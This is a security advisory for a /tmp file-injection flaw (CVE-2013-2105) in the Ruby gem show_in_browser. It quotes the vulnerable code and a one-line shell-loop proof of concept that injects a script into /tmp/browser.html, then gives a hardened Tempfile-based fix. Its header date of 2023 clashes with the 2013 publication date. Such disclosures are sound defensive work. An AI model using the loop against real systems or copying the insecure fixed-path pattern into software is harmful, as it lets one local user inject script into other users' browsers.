Show In Browser 0.0.3 Ruby Gem File Injection Vulnerability



EKU-ID: 3237 CVE: OSVDB-ID:
Author: Larry Cashdollar Published: 2013-05-27 Verified: Verified


TITLE: Show In Browser 0.0.3 Ruby Gem /tmp file injection vulnerability.
  
DATE: 5/15/2023
  
AUTHOR: Larry W. Cashdollar (@_larry0)
  
DOWNLOAD: https://rubygems.org/gems/show_in_browser
  
DESCRIPTION: Opens arbitrary text in your browser
  
VENDOR: Jonathan Leung
  
FIX: N/A
  
CVE: 2013-2105
  
DETAILS: The following code (excerpted from the gem) uses the fixed temporary file "/tmp/browser.html" insecurely: the path is predictable, lives in the world-writable /tmp, and is opened for writing without exclusive creation, so any local user can create the file before show() runs.
  
  FILE_LOCATION = "/tmp/browser.html"

  class << self

    def show(html)
      # Opens the fixed path with 'w', writing into whatever already exists there
      file = File.open(FILE_LOCATION, 'w')
      file.write(html)
      file.close

      # Launches the browser via a shell command with the path interpolated
      `open #{FILE_LOCATION}`
    end
  end
  
  
A malicious local user who creates /tmp/browser.html first and repeatedly writes to it can inject malicious HTML into
the file right before it is opened in the browser.
  
PoC:
  
  
nobody@pitter:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/browser.html; done
  
This will pop up a JavaScript alert in other gem users' browsers.
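A hardened replacement for the show() method quoted above, added here as an example (this is not the gem's code): it uses Ruby's Tempfile.create for an unpredictable, exclusively created, mode 0600 file and launches the viewer without a shell. The `opener` keyword is a hypothetical hook so the launch can be swapped out in tests.

```ruby
require 'tempfile'

# Hardened version of the advisory's show(): no fixed, predictable path in
# the world-writable /tmp. Tempfile.create picks a random name and opens it
# with O_CREAT|O_EXCL and mode 0600, so a file or symlink another local user
# planted in advance makes creation fail instead of being written to or
# followed. The browser is launched with argv (no shell, no interpolation
# of the path into a command string). `opener` is a hypothetical hook; the
# default mirrors the gem's `open <file>` behaviour on macOS. Returns the
# path; the caller deletes the file once the browser has loaded it.
def show_in_browser_safely(html, opener: ->(path) { system('open', path) })
  file = Tempfile.create(['show_in_browser', '.html'])
  begin
    file.write(html)
    file.flush
    file.fsync
  ensure
    file.close
  end
  opener.call(file.path)
  file.path
end

# The property the original lacks, spelled out: creating with File::EXCL
# refuses a path that already exists (a pre-planted file or symlink).
# Returns true when the file was newly created, false if it already existed.
def exclusive_create(path, content)
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0o600) do |f|
    f.write(content)
  end
  true
rescue Errno::EEXIST
  false
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample input; the opener only prints instead of launching a browser.
  path = show_in_browser_safely('<p>hello</p>', opener: ->(p) { puts "would open #{p}" })
  printf("created %s with mode %04o\n", path, File.stat(path).mode & 0o777)
  File.delete(path)
end
```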
  
ADVISORY: http://vapid.dhs.org/advisories/show_in_browser.html